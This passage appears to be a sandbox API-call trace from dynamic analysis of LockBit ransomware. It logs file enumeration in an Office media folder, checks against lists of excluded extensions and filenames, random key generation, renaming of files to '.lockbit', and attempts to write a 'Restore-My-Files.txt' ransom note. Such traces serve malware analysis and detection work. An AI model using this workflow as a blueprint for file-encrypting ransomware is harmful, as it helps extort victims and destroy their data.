ftLastWriteTime.dwLowDateTime=0x653ad300, ftLastWriteTime.dwHighDateTime=0x1bfaf58, nFileSizeHigh=0x0, nFileSizeLow=0x5168, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0332268.WMF", cAlternateFileName="")) returned 1 [0199.520] lstrcmpiW (lpString1=".", lpString2="J0332268.WMF") returned -1 [0199.520] lstrcmpiW (lpString1="..", lpString2="J0332268.WMF") returned -1 [0199.520] PathFindExtensionW (pszPath="J0332268.WMF") returned=".WMF" [0199.520] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.520] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.521] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.521] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0332268.WMF") returned 1 [0199.522] lstrcmpiW (lpString1="ntldr", lpString2="J0332268.WMF") returned 1 [0199.522] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0332268.WMF") returned 1 [0199.522] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0332268.WMF") returned -1 [0199.522] lstrcmpiW (lpString1="autorun.inf", lpString2="J0332268.WMF") returned -1 [0199.522] lstrcmpiW (lpString1="thumbs.db", lpString2="J0332268.WMF") returned 1 [0199.522] lstrcmpiW (lpString1="iconcache.db", lpString2="J0332268.WMF") returned -1 [0199.522] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.522] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF") returned=".WMF" [0199.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.522] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.522] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.523] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.523] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF.lockbit") returned 70 [0199.523] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0332268.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0199.525] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.525] malloc (_Size=0x40068) returned 0x3e70008 [0199.525] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=20840) returned 1 [0199.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0199.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0199.526] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0199.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.531] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.531] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.533] free (_Block=0x1fa2ed8) [0199.533] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.533] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.533] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.533] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x666c0000, ftCreationTime.dwHighDateTime=0x1bfaf58, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x666c0000, ftLastWriteTime.dwHighDateTime=0x1bfaf58, nFileSizeHigh=0x0, nFileSizeLow=0x47c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0332364.WMF", cAlternateFileName="")) returned 1 [0199.533] lstrcmpiW (lpString1=".", lpString2="J0332364.WMF") returned -1 [0199.533] lstrcmpiW (lpString1="..", lpString2="J0332364.WMF") returned -1 [0199.533] PathFindExtensionW (pszPath="J0332364.WMF") returned=".WMF" [0199.533] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.533] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.533] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.533] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.533] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.533] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.533] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.533] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.534] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.534] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0332364.WMF") returned 1 [0199.535] lstrcmpiW (lpString1="ntldr", lpString2="J0332364.WMF") returned 1 [0199.535] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0332364.WMF") returned 1 [0199.535] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0332364.WMF") returned -1 [0199.535] lstrcmpiW (lpString1="autorun.inf", lpString2="J0332364.WMF") returned -1 [0199.535] lstrcmpiW (lpString1="thumbs.db", lpString2="J0332364.WMF") returned 1 [0199.535] lstrcmpiW (lpString1="iconcache.db", lpString2="J0332364.WMF") returned -1 [0199.535] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.535] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF") returned=".WMF" [0199.535] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.535] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.535] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.536] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.536] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF.lockbit") returned 70 [0199.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0332364.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0199.541] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.541] malloc (_Size=0x40068) returned 0x3df0008 [0199.541] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18370) returned 1 [0199.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.542] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.544] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.544] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.544] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.546] free (_Block=0x1fa2ed8) [0199.546] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.546] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.546] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ca1000, ftCreationTime.dwHighDateTime=0x1bfaf58, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc5ca1000, ftLastWriteTime.dwHighDateTime=0x1bfaf58, nFileSizeHigh=0x0, nFileSizeLow=0x1f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0335112.WMF", cAlternateFileName="")) returned 1 [0199.546] lstrcmpiW (lpString1=".", lpString2="J0335112.WMF") returned -1 [0199.546] lstrcmpiW (lpString1="..", lpString2="J0335112.WMF") returned -1 [0199.546] PathFindExtensionW (pszPath="J0335112.WMF") returned=".WMF" [0199.546] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.546] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.546] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.546] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.546] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.547] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.547] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0335112.WMF") returned 1 [0199.548] lstrcmpiW (lpString1="ntldr", lpString2="J0335112.WMF") returned 1 [0199.548] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0335112.WMF") returned 1 [0199.548] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0335112.WMF") returned -1 [0199.548] lstrcmpiW (lpString1="autorun.inf", lpString2="J0335112.WMF") returned -1 [0199.548] lstrcmpiW (lpString1="thumbs.db", lpString2="J0335112.WMF") returned 1 [0199.548] lstrcmpiW (lpString1="iconcache.db", lpString2="J0335112.WMF") returned -1 [0199.548] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.548] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF") returned=".WMF" [0199.548] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.548] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.549] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW 